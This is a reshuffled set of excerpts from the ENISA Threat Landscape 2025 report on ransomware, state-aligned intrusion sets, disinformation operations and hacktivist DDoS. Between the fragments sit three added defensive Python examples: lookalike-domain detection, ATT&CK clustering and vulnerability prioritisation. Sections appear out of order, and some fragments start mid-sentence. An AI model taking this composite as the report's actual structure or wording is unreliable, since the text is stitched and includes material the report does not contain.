ENISA THREAT LANDSCAPE 2025 TLP:CLEAR | October 2025
attempts to disrupt operational technology systems [134]. These campaigns often aimed to publicly associate manufacturers with geopolitical conflicts, particularly when firms were linked to defence supply chains [135]. Cybercrime is reportedly the primary threat to the manufacturing sector, both in terms of level of activity (59.3%) and reported impact. While data breaches accounted for 20.5%, the most deployed ransomware strains included Akira (48.7%), Qilin (20.5%) and FOG (10.3%). In H2 2024, multiple ransomware incidents resulted in prolonged disruptions to the business continuity of EU manufacturing organisations, including an attack by BlackBasta on the German consumer-electronics maker Medion AG that caused prolonged IT and website disruptions in November 2024 [136, 137], and the targeting of the German Arntz Optibelt Group in August 2024 that impacted its IT systems [138, 139]. These incidents illustrate the impact of ransomware on the manufacturing sector. As both companies operate globally, including in the EU, it is highly likely these attacks also had an impact in other EU MSs.
Based on reports mentioning the targeting of the manufacturing sector by State-nexus intrusion sets in the EU, two incidents were identified: activity imputed to UNC5221 observed in Germany, and an unidentified China-nexus intrusion set linked to a broader campaign involving clusters such as PurpleHaze and ShadowPad. This campaign, running from July 2024 to March 2025, affected over 70 global targets, including multiple entities in manufacturing. It is plausible that part of these activities pertained to the theft of intellectual property.
This is notably exemplified by spearphishing campaigns for cyberespionage purposes targeting EU MSs, with a particular focus on transport [238, 239], defence and logistics related entities as well as telecommunications infrastructures [240, 241] and embassies, carried out by APT28. This intrusion set was also observed targeting political parties and institutions [242, 243]. In the aftermath of its successful compromise of Microsoft systems in January 2024 [244, 245], APT29 was reported to be conducting a global rogue RDP campaign using spearphishing emails to target multiple EU MSs, the European Space Agency (ESA) and NATO Enterprise [246, 247, 248, 249]. Registration of the identified infrastructure reportedly started as early as August 2024, with domains notably impersonating Amazon and Microsoft services and masquerading as organisations in the government, NGO, military and IT sectors. APT29 was also seen resuming its wine-tasting-event spearphishing campaign, masquerading as an EU MS embassy to target EU Ministries of Foreign Affairs [250, 251]. Finally, Turla and Sandworm, both assessed to be particularly advanced intrusion sets, were reported active in the EU. While focused on conducting cyberespionage and disruptive campaigns against Ukraine, Sandworm’s apparent mandate still pertains to the energy vertical [252, 253], notably illustrated by its targeting of a gas storage entity in an EU MS, as well as a spearphishing campaign targeting attendees of an EU-based natural gas conference [254]. Turla was reported as conducting a long-standing cyberespionage campaign seemingly focused on one specific EU MS, with multiple attempts against governmental entities between January 2024 and May 2025 [255].
The top five China-nexus intrusion sets active in the EU include UNC5221 (reportedly overlapping with Volt Typhoon), Mustang Panda, APT41, Flax Typhoon and Salt Typhoon. The overall targeting of China-nexus intrusion sets in the EU indicates a focus on the public administration, transport, civil society and digital infrastructure sectors, as well as consistent cyberespionage campaigns against Italy, Germany, France and Belgium.
7. STATE-ALIGNED ACTIVITIES
In this section, ‘nexus’ should be understood as aligned or associated to some extent with a specific country, as reported in open sources, based on public attributions from national, EU and non-EU authorities as well as high-confidence imputation by trusted private vendors. State-aligned adversaries tracked by ENISA include state-nexus intrusion sets, hackers-for-hire, faketivists and private sector offensive actors (PSOAs). While also considered a part of state-aligned activities, Intrusion Manipulation Sets (IMS) involved in information operations are covered in a separate dedicated section of this report. Among state-aligned adversaries, 46 distinct intrusion sets were observed to be active in the EU over the reporting period. Approximately 14.2% of state-aligned malicious cyber activities were not imputed to a known or newly documented intrusion set, with Russia-nexus recording the highest number of unidentified intrusion sets (47%), followed by China-nexus (43%) and DPRK-nexus (36%). This gap likely stems from shifts in or the emergence of observed Tactics, Techniques and Procedures (TTPs) and toolsets leveraged by intrusion sets, known offensive cyber doctrines of specific nexuses (i.e. usage of front companies, contractors, digital quartermasters) and the diverse tracking and reporting practices of private vendors. While this lack of association does not impact detection strategy, it is likely to hinder accurate situational awareness and preparedness efforts.
Between July 2024 and July 2025, 7.2% of incidents associated with state-aligned activities against EU MSs were identified, with Russia-nexus intrusion sets documented as the most active, followed by China-nexus and DPRK-nexus intrusion sets. Over the reporting period, outliers were identified, notably with activities carried out by India-nexus intrusion sets. While accounting for a low share, state-aligned cyberespionage remains a primary concern in the medium-to-long term.
In the near term, it is highly likely public and private organisations in EU MSs will continue to face hacktivist-associated threats with periodic peaks, stable cyberespionage activities with a continued prevalence of Russia-nexus and China-nexus intrusion sets, and an even more mature yet further fragmented cybercriminal ecosystem. In terms of impact, the EU threat picture will remain dominated by opportunistic cybercriminal activities involving the use of ransomware and information-stealers, despite the achievements of law enforcement. Displaced or disrupted RaaS brands will continue being promptly replaced by emerging programmes. The criminal marketplace will continue formalising around skills to further scale campaigns, notably through AI integration, IoT and large-scale exploitation of vulnerabilities and the targeting of critical sectors, notably hosting companies and IT providers. The rising use of EDR-kill tooling (e.g., AvNeutralizer, EDRKillShifter) and BYOVD, as well as legal-pressure features in extortion playbooks, will sharpen both the speed and leverage of intrusions.
Hacktivist-led DDoS will persist as a nuisance, both in terms of the disruption of business continuity and in the information operation sphere, highly likely with spikes around high visibility events and announcements by EU MSs and EU entities and authorities. State-nexus intrusion sets will continue to blend espionage, supply-chain access and IO, increasingly leaning on compromised EU-hosted infrastructure. Looking forward, cyber threat activity is likely to further intensify along three dimensions: convergence, automation and industrialisation. AI will accelerate cycles of offensive innovation, enabling rapid campaign development and more effective deception techniques. Abuse of cyber dependencies will remain a strategic priority, while the persistence of hacktivism and disinformation campaigns will continue to influence public perception and policy debates. The highlights of this report underscore how defensive strategies must become intelligence-driven and systemic, emphasising proactive threat hunting, behavioural detection and the integration of cyber risk management into broader operational and policy frameworks.
Organisations should prioritise comprehensive asset discovery, automated vulnerability management and resilience planning for interconnected systems and services. Collaboration between Member States, EU institutions and private industry is essential for countering the threats. In parallel, the European policy landscape is evolving to address these challenges. The Cyber Resilience Act (CRA) introduces mandatory security requirements for digital products and services, aimed at reducing systemic vulnerabilities by embedding security-by-design practices and formalising vulnerability disclosure obligations. The Cyber Solidarity Act (CSoA) strengthens Europe’s collective defence by improving mechanisms for cross-border incident response and the coordinated sharing of threat intelligence. The updated Cybersecurity Blueprint further supports these efforts by creating structured escalation paths and standardised response procedures for large-scale incidents.
Together, these frameworks provide the foundation for a more unified and proactive cybersecurity posture across the EU. In close cooperation with Union entities, ENISA is central to translating these policy measures into tangible outcomes. Its work on situational awareness, operational cooperation, support for critical sectors, certification schemes, capacity building and policy monitoring ensures that regulatory initiatives are supported by strategic and operational expertise. Through coordination of the CSIRT Network, support to CyCLONe, and the development of taxonomies and reporting frameworks, ENISA helps to harmonise reporting obligations and improve the visibility of systemic risks. Annual threat assessments, red-teaming exercises and sector-specific guidance further reinforce the EU’s readiness, enabling organisations and Member States to operationalise regulatory requirements.
Almost all EU MSs were reportedly targeted by State-aligned offensive cyber activities. While no information related to the targeting of Luxembourg was identified in open sources, it is plausible the targeting of this MS would be conflated in the ‘unidentified EU MS’ category. Accounting for 38% of the total number of reported targeting, this category notably includes vague phrasing documented in open-source reports such as ‘Western Europe’, ‘Southern Europe’, or ‘EU country’.
From a sectorial vantage point, the top five targeted NIS2 sectors in the EU by State-aligned threat groups based on open-source reports include public administration, transport, digital infrastructure, energy and health. As mentioned before, this ranking comes with multiple caveats, based on unspecified or non-granular reporting – notably exemplified by the ‘unknown’ and ‘private companies’ categories accounting for 33% of all recorded targeting as well as differences in sectorial worldwide reporting conventions. However, as will be detailed in the following sections and based on historical reporting, this graph is assessed to be a realistic snapshot of sectorial targeting by State-aligned intrusion sets.
7.1 KEY STATE-ALIGNED THREATS
7.1.1 Russia-nexus intrusion sets
Reportedly the most active over the reporting period, Russia-nexus intrusion sets continuously targeted EU MSs in cyberespionage campaigns. The most documented intrusion sets include APT29, followed by APT28 and Sandworm. Overall, Russia-nexus offensive cyber activities targeted the public administration, with a clear focus on governmental and diplomatic entities, the defence sector and the digital infrastructure sector. While targeting multiple EU MSs, geographical targeting in the EU indicates a focus on Poland, France, Germany, Belgium and Greece. Both sectorial and geographical targeting are likely to be partly related to EU MSs’ support for Ukraine, in the context of Russia’s war of aggression against Ukraine since February 2022.
increase legitimacy of false narratives. The intensity of attacks against public institutions tended to increase around and during election periods or important political events. Doppelgänger, a major and long-running IMS, recently imputed to Struktura and Social Design Agency and reportedly directly funded by the Russian state [349], was seen to be particularly targeting French, German and Polish national audiences and public institutions, as well as the Union, most notably through inauthentic articles conveying anti-EU sentiments, especially in the context of Russia’s war of aggression against Ukraine. With an initial focus on impersonating Western news outlets and government websites, Doppelgänger has evolved into a multi-layered operation, reportedly deploying large networks of fake domains impersonating legitimate outlets designed to manipulate platform algorithms, running sponsored ads on Meta [350] to drive traffic to its deceptive sites and relying on large-scale Coordinated Inauthentic Behaviour (CIB) networks to ensure widespread distribution.
Over time, the campaign has shown resilience by refining its techniques and adapting to takedowns by hosting providers and social media platforms: re-registering websites under different Top-Level Domains (TLDs), migrating to different hosting providers and using disposable social media accounts to amplify content [351]. In December 2024, Doppelgänger-associated entities and individuals were sanctioned by the EU [352], the UK [353] and the US [354]. Notably known for its videos impersonating EU institutions such as the Parliament and the Commission, EU MSs’ public institutions within the security sector [355] and public media outlets, Matryoshka [356, 357] was reported to be using AI-assisted voice cloning to increase the perceived legitimacy of the impersonation videos [358], with June 2025 marking the first instance of cloning the voice of an EU official [359]. The videos are amplified on X and Bluesky through two sets of coordinated inauthentic accounts (CIBs): a first set known as ‘seeder’ accounts posts the videos, which are then further shared by a larger set of accounts known as ‘amplifiers’.
While targeting similar audiences to Doppelgänger, Matryoshka impersonates French and German public institutions with misleading narratives addressing broader audiences [360, 361, 362]. The IMS strategically exploits narratives during major events such as election campaign seasons in countries such as Poland and Moldova. Matryoshka has reportedly funnelled substantial operational resources towards Moldova [363]. Storm-1516 [364, 365] operates a growing network of at least 230 inauthentic websites to publish inauthentic articles in English, French and German and display visual features mimicking Western media outlets. These inauthentic websites, as well as X accounts, are used to strategically launder information, with some of them identified for their repeated involvement in FIMI operations including the publication of fake investigations, social media posts and videos. Over the reporting period, Storm-1516 notably focused its actions on the German legislative elections, publishing multiple narratives questioning the integrity of the elections [366].
Investigations show the involvement of individuals and organisations close to the Russian government behind the operations carried out by Storm-1516 [367]. Known for its overlap in amplification patterns with Storm-1516, The Russian Foundation to Battle Injustice often publishes content mostly in English, German and French, such as inauthentic articles, which is then laundered and amplified across various
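The re-registration pattern described above, the same impersonating label reappearing under new TLDs after a takedown, can be surfaced from a domain feed by comparing registrable labels rather than full host names. The Python below is an added example, not code from the report or from any organisation it cites. The watchlist, the observed registrations and the small suffix set are constructed (the .example TLD is reserved for documentation); a real deployment would use the Public Suffix List instead of the hand-written suffix set.

```python
import difflib

# Constructed watchlist of legitimate outlet domains and constructed observed
# registrations. None of these are real domains.
WATCHLIST = ["northsea-gazette.example", "alpinedaily.example"]
OBSERVED = [
    "northsea-gazette.info", "www.northsea-gazette.online", "northsea-gazette.top",
    "northseagazette.net", "northsea-gazete.com", "alpine-daily.site",
    "alpinedaily.co.uk", "unrelated-shop.com", "northsea-gazette.example",
]

# Assumption: a tiny hand-written set of multi-label public suffixes; the
# Public Suffix List is the right source for production use.
MULTI_LABEL_SUFFIXES = {"co.uk", "com.au"}


def registrable_label(domain):
    """Return (registrable label, public suffix), e.g. ('alpinedaily', 'co.uk')."""
    labels = domain.lower().rstrip(".").split(".")
    if labels[0] == "www":
        labels = labels[1:]
    if len(labels) < 2:
        raise ValueError(f"not a registrable domain: {domain!r}")
    if len(labels) >= 3 and ".".join(labels[-2:]) in MULTI_LABEL_SUFFIXES:
        return labels[-3], ".".join(labels[-2:])
    return labels[-2], labels[-1]


def normalise(label):
    """Collapse separators so 'northsea-gazette' and 'northseagazette' compare equal."""
    return label.replace("-", "").replace("_", "")


def similarity(a, b):
    """Ratio in [0, 1] between two normalised labels (1.0 means identical)."""
    return difflib.SequenceMatcher(None, normalise(a), normalise(b)).ratio()


def find_lookalikes(watchlist, observed, threshold=0.85):
    """Map each watchlisted domain to observed domains that reuse its label,
    exactly or approximately (typo variants), under any public suffix.
    The legitimate registration itself is excluded from its own hits."""
    hits = {legit: [] for legit in watchlist}
    for legit in watchlist:
        legit_label, legit_suffix = registrable_label(legit)
        for domain in observed:
            label, suffix = registrable_label(domain)
            if suffix == legit_suffix and normalise(label) == normalise(legit_label):
                continue
            if similarity(label, legit_label) >= threshold:
                hits[legit].append(domain)
        hits[legit].sort()
    return hits


def tld_spread(hits):
    """Distinct public suffixes per impersonated outlet: repeated re-registration
    after takedowns shows up as a high count for one label."""
    return {legit: len({registrable_label(d)[1] for d in domains})
            for legit, domains in hits.items()}


if __name__ == "__main__":
    found = find_lookalikes(WATCHLIST, OBSERVED)
    spread = tld_spread(found)
    for legit, domains in found.items():
        print(f"{legit}: {len(domains)} lookalikes across {spread[legit]} TLDs")
        for d in domains:
            print("   ", d)
```

The threshold of 0.85 is a tuning knob: lowering it catches more typo variants at the cost of false positives on short labels, so review hits for labels under roughly eight characters by hand.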
A cluster appears around the discovery techniques (e.g., T1057 Process Discovery, T1016 System Network Configuration Discovery, T1082 System Information Discovery, T1083 File and Directory Discovery, T1135 Network Share Discovery), indicating they are frequently enumerated together under the discovery tactic, which is typical when adversaries inventory systems and networks. A second cluster centres on execution techniques — notably the command and scripting interpreter family (T1059 and sub-techniques T1059.001/.003/.005) and related execution vectors (T1047 WMI, T1106 Native API, T1569.002 Service Execution, T1204.* User Execution). Persistence shows its own block (T1543.003 Windows Service, T1112 Modify Registry, T1547.* logon/registry autostart, T1136 Create Account, T1078.* Valid/Domain/Local Accounts): persistence techniques like Windows Services (T1543.003), registry changes (T1112, T1547.*) and account creation or abuse (T1136, T1078.*) often appear together, showing how adversaries layer multiple foothold methods. Smaller but coherent blocks appear for Exfiltration (T1041, T1048.*, T1052.001, T1567.*) and Impact (T1485, T1486, T1489, T1490, T1491.001, T1529). A more detailed version of the TTPs is available in the Appendix.
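The clustering described above rests on a simple idea: count how often two technique IDs are recorded in the same report, keep the pairs that recur, and read off the connected groups. The following Python is an added example of that computation, not code from the ENISA report. The technique IDs are real ATT&CK identifiers named in the paragraph; the thirteen incident records and the one-tactic-per-technique labelling used for cluster names are constructed for illustration.

```python
from collections import Counter, defaultdict
from itertools import combinations

# Constructed sample: each set holds the ATT&CK technique IDs recorded in one
# fictional incident report. The IDs are real ATT&CK identifiers; the incidents are not.
SAMPLE_REPORTS = [
    # discovery-heavy reports
    {"T1057", "T1016", "T1082", "T1083", "T1059.001"},
    {"T1057", "T1082", "T1083", "T1135", "T1059.003"},
    {"T1016", "T1082", "T1135", "T1057", "T1059.005"},
    # execution-heavy reports
    {"T1059.001", "T1047", "T1106", "T1204.002"},
    {"T1059.001", "T1047", "T1106", "T1569.002"},
    {"T1059.003", "T1047", "T1204.002", "T1569.002"},
    # persistence-heavy reports
    {"T1543.003", "T1112", "T1547.001", "T1136", "T1078.002"},
    {"T1543.003", "T1112", "T1078.002", "T1486"},
    {"T1112", "T1547.001", "T1136", "T1041"},
    # exfiltration and impact reports
    {"T1041", "T1048.003", "T1567.002", "T1486", "T1490"},
    {"T1041", "T1567.002", "T1048.003", "T1485", "T1489"},
    {"T1486", "T1490", "T1489", "T1485"},
    {"T1486", "T1489", "T1490"},
]

# Assumption: one primary tactic per technique, used only to name clusters.
# Several of these techniques map to more than one tactic in ATT&CK
# (e.g. T1543.003 is also Privilege Escalation, T1112 is Defense Evasion).
PRIMARY_TACTIC = {
    **dict.fromkeys(["T1057", "T1016", "T1082", "T1083", "T1135"], "discovery"),
    **dict.fromkeys(["T1059.001", "T1059.003", "T1059.005", "T1047",
                     "T1106", "T1569.002", "T1204.002"], "execution"),
    **dict.fromkeys(["T1543.003", "T1547.001", "T1136", "T1078.002"], "persistence"),
    "T1112": "defense-evasion",
    **dict.fromkeys(["T1041", "T1048.003", "T1567.002"], "exfiltration"),
    **dict.fromkeys(["T1485", "T1486", "T1489", "T1490"], "impact"),
}


def cooccurrence(reports):
    """Count, for each unordered technique pair, the reports in which both appear."""
    pairs = Counter()
    for techniques in reports:
        for a, b in combinations(sorted(techniques), 2):
            pairs[(a, b)] += 1
    return pairs


def cluster(reports, min_shared=2):
    """Group techniques that co-occur in at least `min_shared` reports.

    Builds a graph with one edge per qualifying pair and returns its connected
    components, largest first. Techniques with no qualifying pair are omitted.
    """
    adjacency = defaultdict(set)
    for (a, b), n in cooccurrence(reports).items():
        if n >= min_shared:
            adjacency[a].add(b)
            adjacency[b].add(a)
    seen, clusters = set(), []
    for start in sorted(adjacency):
        if start in seen:
            continue
        component, stack = set(), [start]
        while stack:  # iterative depth-first traversal of one component
            node = stack.pop()
            if node in component:
                continue
            component.add(node)
            stack.extend(adjacency[node] - component)
        seen |= component
        clusters.append(frozenset(component))
    return sorted(clusters, key=lambda c: (-len(c), min(c)))


def dominant_tactic(techniques):
    """Name a cluster after the most common primary tactic of its members."""
    counts = Counter(PRIMARY_TACTIC.get(t, "unknown") for t in techniques)
    return counts.most_common(1)[0][0]


def summarise(reports, min_shared=2):
    """Return [(tactic label, sorted technique IDs), ...], one entry per cluster."""
    return [(dominant_tactic(c), sorted(c)) for c in cluster(reports, min_shared)]


if __name__ == "__main__":
    for tactic, members in summarise(SAMPLE_REPORTS):
        print(f"{tactic:16s} {', '.join(members)}")
```

With `min_shared=2` the sample separates into the five blocks the paragraph describes; raising the threshold on a real corpus is the usual way to stop execution techniques (present in almost every report) from gluing every cluster together.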
When documenting tactics, techniques and procedures (TTPs), it is important to recognise that vulnerabilities are part of the picture. Exploitation of vulnerabilities remains a prevalent intrusion vector (21.3%). Vulnerabilities are commonly assigned identifiers and, when included in TTP documentation and thoroughly documented, these connect adversary behaviour to the precise weaknesses they exploit. Tracking vulnerabilities with the surrounding TTP context supports effective prioritisation. By embedding vulnerabilities within the broader structure of TTPs, defenders gain both the technical detail needed for patching and the operational context needed to assess risk and allocate resources effectively. In line with Coordinated Vulnerability Disclosure practices in the EU [483] and complementary to its role as a CVE Numbering Authority (CNA) [484], ENISA maintains the European Vulnerability Database (EUVD) [485] to further support the cybersecurity community by providing reliable and timely information related to vulnerabilities.
Overall, 42 595 new vulnerabilities were disclosed over the reporting period — a 27% increase from the previous year. A breakdown of the vulnerabilities in the Common Vulnerability Scoring System (CVSS) shows that 7% were Critical, 26% High, 43% Medium and 3% Low, while 21% remained unscored, likely reflecting delays or gaps in CVSS assignments.
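The two paragraphs above make a concrete recommendation: keep each vulnerability record next to the adversary behaviour it enables, and let that context, not the CVSS number alone, drive remediation order. The Python below is an added example of such a record set with a severity breakdown and a context-aware priority ordering; it is not code from the report or from the EUVD. The severity bands follow the published CVSS v3.1 qualitative scale; the six records, their identifiers, scores, asset counts and the priority weights are constructed (the identifiers are placeholders, not CVE numbers), while T1190, T1068, T1505.003, T1133 and T1195.002 are real ATT&CK technique IDs.

```python
from collections import Counter
from dataclasses import dataclass
from typing import Optional, Tuple

# Real ATT&CK technique IDs that describe a foothold gained from outside the
# perimeter; the subset chosen here is an assumption of this example.
INITIAL_ACCESS_TECHNIQUES = {"T1190", "T1133", "T1195.002"}


@dataclass(frozen=True)
class VulnRecord:
    vuln_id: str
    cvss: Optional[float]         # CVSS v3.x base score, None if not yet scored
    techniques: Tuple[str, ...]   # ATT&CK techniques the exploitation is linked to
    exploited_in_wild: bool       # active exploitation reported
    affected_assets: int          # matches in the organisation's asset inventory


# Constructed records: placeholder identifiers, invented scores and counts.
SAMPLE_VULNS = [
    VulnRecord("EXAMPLE-0001", 9.8, ("T1190",), True, 12),
    VulnRecord("EXAMPLE-0002", 7.5, ("T1190", "T1505.003"), True, 3),
    VulnRecord("EXAMPLE-0003", 9.1, (), False, 40),
    VulnRecord("EXAMPLE-0004", 5.3, ("T1068",), False, 100),
    VulnRecord("EXAMPLE-0005", None, ("T1190",), True, 2),
    VulnRecord("EXAMPLE-0006", 3.1, (), False, 0),
]


def cvss_severity(score):
    """Qualitative rating for a CVSS v3.x base score (CVSS v3.1 scale)."""
    if score is None:
        return "unscored"
    if not 0.0 <= score <= 10.0:
        raise ValueError(f"CVSS base score out of range: {score}")
    if score == 0.0:
        return "none"
    if score < 4.0:
        return "low"
    if score < 7.0:
        return "medium"
    if score < 9.0:
        return "high"
    return "critical"


def severity_breakdown(records):
    """Percentage of records per severity rating, rounded to one decimal."""
    counts = Counter(cvss_severity(r.cvss) for r in records)
    total = len(records)
    return {rating: round(100.0 * n / total, 1) for rating, n in counts.items()}


# Assumption: weights chosen for this example. Unscored vulnerabilities are
# ranked like "medium" until a score arrives, so they are not silently dropped.
SEVERITY_RANK = {"critical": 4, "high": 3, "medium": 2, "unscored": 2, "low": 1, "none": 0}


def priority_score(record):
    """Combine CVSS severity with operational context: observed exploitation,
    documented adversary technique linkage and exposure in the asset inventory."""
    score = 10 * SEVERITY_RANK[cvss_severity(record.cvss)]
    if record.exploited_in_wild:
        score += 20
    if record.techniques:
        score += 5   # behaviour is documented, so detections can be mapped to it
    if INITIAL_ACCESS_TECHNIQUES.intersection(record.techniques):
        score += 5   # exploitation yields a foothold from outside the perimeter
    score += min(record.affected_assets, 20)  # cap so exposure cannot swamp severity
    return score


def prioritise(records):
    """Vulnerability IDs ordered for remediation, highest priority first."""
    return [r.vuln_id for r in sorted(records, key=priority_score, reverse=True)]


if __name__ == "__main__":
    print(severity_breakdown(SAMPLE_VULNS))
    for r in sorted(SAMPLE_VULNS, key=priority_score, reverse=True):
        print(f"{r.vuln_id} {cvss_severity(r.cvss):9s} score={priority_score(r)}")
```

On the sample, the exploited High vulnerability with a web-shell technique attached (EXAMPLE-0002) outranks the context-free Critical one (EXAMPLE-0003), which is the point the text makes: the identifier and score tell you what to patch, the TTP context tells you how urgently.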
While incidents impacting the health sector accounted for only 4.2% of the overall cybercrime incidents identified, ransomware attacks against two German organisations that resulted in the postponement of medical procedures remain of particular concern [182, 183].
6.3 CYBERCRIME GEOGRAPHICAL IMPACT
Ransomware incidents continued affecting EU Member States, with a notable shift in geographical impact compared to ETL 2024. The top five EU MSs referenced in ransomware and data breach claims include Germany (23.4%), Italy (11.33%), Spain (9.8%), France (9.5%) and Belgium (3.7%). While this ranking could stem from multiple factors, and as analysed by the CCB, it is likely these EU MSs are seen as major economic players within the EU and thus represent high-value targets [184]. During the reporting period, manufacturing remained the most consistently targeted sector across all five EU MSs. Germany recorded the highest number of claims by SafePay, INC Ransom and Akira, with the most targeted sectors being manufacturing and digital services providers. Italy saw increased activity from Akira, Sarcoma and Qilin, targeting the manufacturing sector, followed by digital infrastructure and services. Spain saw Qilin in first place, followed by Akira and FOG, with manufacturing being targeted the most, followed by business services and public administration. France was mostly impacted by Qilin, Hunters International and CL0P, while Belgium saw activity from RansomHouse and Play, alongside SafePay and Qilin. In both Belgium and France, manufacturing was the most targeted sector, followed by DIS.
foreign policy briefings disguised as legitimate EU institutional documents [329], UNC3313 and UNC5667 impersonating the Hungarian government [330], Charming Kitten posing as EU-based journalists and think-tank researchers [331] and Kimsuky leveraging EU-branded diplomatic meeting invitations containing malicious macros [332]. As previously mentioned, multiple state-nexus intrusion sets leveraged or compromised EU-based infrastructure to host C2 servers or support follow-up cyberattacks. Such tactics help obfuscate the true origin of traffic, exploit the trust associated with EU network assets and risk implicating EU countries in malicious activity purely on the basis of IP address attribution. China-linked intrusion sets made especially extensive use of EU infrastructure through Operational Relay Box (ORB) networks, incorporating devices, servers and hosting services in the EU [333]. In other cases, EU-hosted servers were used to deliver second-stage payloads, such as the Remcos backdoor, in campaigns targeting Ukraine [334].
Since 2023, Turla has configured its KAZUAR backdoor to communicate via compromised WordPress installations hosted within the EU, further embedding malicious infrastructure in trusted environments [335]. From Q3 2024 to Q2 2025, multiple state-nexus intrusion sets targeted EU entities outside EU territory, focusing on diplomatic missions, development programmes, commercial operations and cultural institutions. These operations often aligned with the geopolitical priorities of the associated nexuses, prioritising intelligence collection on foreign policy, trade negotiations and multilateral security cooperation. This is exemplified by campaigns carried out by the Russia-nexus intrusion set APT29 targeting EU diplomatic missions abroad [336]. This is of particular concern, as overseas missions and affiliated organisations maintain regular contact with Brussels and EU Member State capitals, so compromises could facilitate lateral movement into core EU networks.
This operational reality underscores the advantage adversaries gain by focusing on outposts in third countries, where strategic data can be collected in potentially more permissive environments. State-nexus intrusion sets also targeted non-EU diplomatic missions, international organisations and commercial entities operating within EU territory, as exemplified by Callisto targeting Russian exiles in the EU, Charming Kitten leveraging journalist personas to approach Middle Eastern embassy staff stationed in European capitals [337], Earth Preta targeting Asian diplomatic missions in EU capitals [338], and TAG-100 conducting reconnaissance activities against the Cuban embassy in France [339]. In August 2024, as part of Operation AkaiRyū, MirrorFace was reportedly seen for the first time in the EU. Based on MirrorFace’s historical focus on Japan, it is highly likely that targeting the EU served as a vector to target Japanese entities [340].
3. THREAT LANDSCAPE OVERVIEW
Based on the analysis of the dataset, social engineering tactics remain the primary entry point for threat actors, with phishing (including vishing, malspam and malvertising) accounting for about 60% of observed cases. Exploitation of vulnerabilities (21.3%) remains a prevalent intrusion vector, followed by botnets (9.9%). Malicious applications represent 8%, showing that compromised or trojanised software and applications continue to play a role in system intrusions, while unauthorised access by insider threats (0.8%) contributes a smaller but still relevant share. Overall, the distribution underscores that while phishing dominates the threat landscape, technical exploits, malware delivery mechanisms and insider risks remain meaningful concerns.
The data shows clear contrasts between phishing and vulnerability exploitation as intrusion vectors. While phishing is the most common pathway, its impact is diverse. Approximately 73% of phishing cases are classified as unknown, reflecting unclear or varied follow-up of malicious activities, and 27% led to intrusions. In terms of payloads, phishing leads to the deployment of malicious code in 23% of cases, suggesting it might be primarily used for malwareless objectives. Vulnerabilities, on the other hand, show a more focused risk profile. Nearly 70% of vulnerability cases culminate in intrusions, with 30% categorised as unknown, and 68% of these vulnerability-based incidents result in the deployment of malicious code, indicating that the exploitation of vulnerabilities is often a direct precursor to the installation of malware.
The distribution of incident types is dominated by DDoS attacks, which make up about 76.7% of recorded cases. This category is overwhelmingly driven by hacktivist groups, which account for the majority of collected DDoS incidents, with cybercrime groups contributing a marginal fraction, often tied to extortion (e.g., ransom DDoS). Intrusions follow with 17.8%, dominated by cybercriminal activities, followed by state-aligned intrusion sets, which typically pursue persistence. Hacktivists appear only marginally in intrusion cases. Defacements were almost exclusively associated with hacktivists, underlining their role as a symbolic tactic for visibility and protest rather than a sustained intrusion method.
Accounting for approximately 70% of the claims against Lithuania, NoName057(16) was followed by Dark Storm Team, Mr Hamza, OverFlame and Z-PENTEST-ALLIANCE. While NoName057(16), Dark Storm Team and Mr Hamza demonstrated a focus on targeting the public administration and transport sectors, NoName057(16) was also observed targeting the finance vertical. A more granular analysis of our dataset shows some level of focus against specific EU MSs, with clear outliers being the activities of Keymous+ in Estonia and France, and Dark Storm Team activities against Poland and Finland. While it is not possible to establish a clear connection, it is plausible some hacktivist groups have specific geographic assignments to support and/or complement activities against specific EU MSs. As previously mentioned, peaks of hacktivist activity are typically observed following announcements related to Ukraine [422, 423, 424], as notably exemplified by the launch of the #OPBelgium campaign following Belgium’s announcement of €1B in military aid [425, 426, 427]. A few outliers further illustrating this observation were identified in ENISA’s dataset. Between the end of April and May 2025, Anonymous VNLBN claimed at least 27 attacks against France, following announcements of support for Ukraine and the freezing of Russian assets [428, 429]. Fredens of Security’s targeting of Italy, Germany, Denmark and Poland between 12 and 15 December 2024 followed declarations of assistance and equipment deliveries to Ukraine [430, 431, 432]. The targeting of Belgium by INDOHAXSEC TEAM from 10 December to 12 December 2024 may be viewed in the context of the European Council’s approval of the second payment under the EU’s Ukraine Facility [433]. It may be noted that these groups were only active for these very short-lived, highly focused operations. Finally, EU MSs’ electoral processes over the reporting period were particularly targeted by hacktivist-led DDoS claims [434, 435, 436].
9.3 HACKTIVISM SECTORIAL TARGETING
Across the EU, targeting patterns reveal both common sectorial focuses and country-specific nuances, with public administration, finance, transport and digital infrastructure remaining the prime targets across all EU MSs. The targeting of the manufacturing and energy sectors is prevalent in Poland, Czechia and Romania, all three being heavily involved in supply-chain support for Ukraine. Over the reporting period, the sectors most impacted by hacktivist activities in the EU included public administration (63.1%), transport (12%), finance (11.7%), digital infrastructure (5.4%), and manufacturing and media/entertainment (4% each).
6.4 KEY CYBERCRIME TRENDS
6.4.1 Tactics, Techniques and Procedures (TTPs)
Over the reporting period, cybercriminal groups were seen updating their TTPs, notably through the development or maintenance of their toolsets, as well as their pressure tactics. Reuse of leaked builders continued to be observed, as illustrated by the SafePay ransomware, suspected of being derived from a modified LockBit3 builder [185]. It is likely that the publication of the VanHelsing RaaS source code in May 2025 will be leveraged by other ransomware operators and contribute to lowering the barriers of entry to the cybercriminal market for newcomers [186]. While infostealers continued to be delivered through cracked software, phishing pages and public code repositories, new delivery mechanisms were observed, such as fake CAPTCHA verification pages, cloud-based file hosting services and embedded links in video platforms, as well as other high-traffic, low-cost delivery vectors [187, 188]. During this reporting period, cybercrime groups started using tools designed to disable Endpoint Detection and Response (EDR) solutions, enabling them to conduct stealthier intrusions focused on rapid data exfiltration. In July 2024, FIN7 was observed advertising AvNeutralizer (aka AuKill), a specialised tool for tampering with endpoint defences, to multiple ransomware groups [189]. The tool had been previously linked to intrusions deploying AvosLocker, MedusaLocker, BlackCat/ALPHV, Trigona and LockBit [190], all of which were reportedly active in the EU. In August 2024, RansomHub started using similar tools, as can be seen by its adoption of EDRKillShifter and TDSSKiller, leveraging them to disable EDR protections [191, 192]. In June 2025, variants of EDRKillShifter started to be incorporated in multiple RaaS toolsets, including LockBit, Medusa and BlackCat/ALPHV [193, 194, 195].
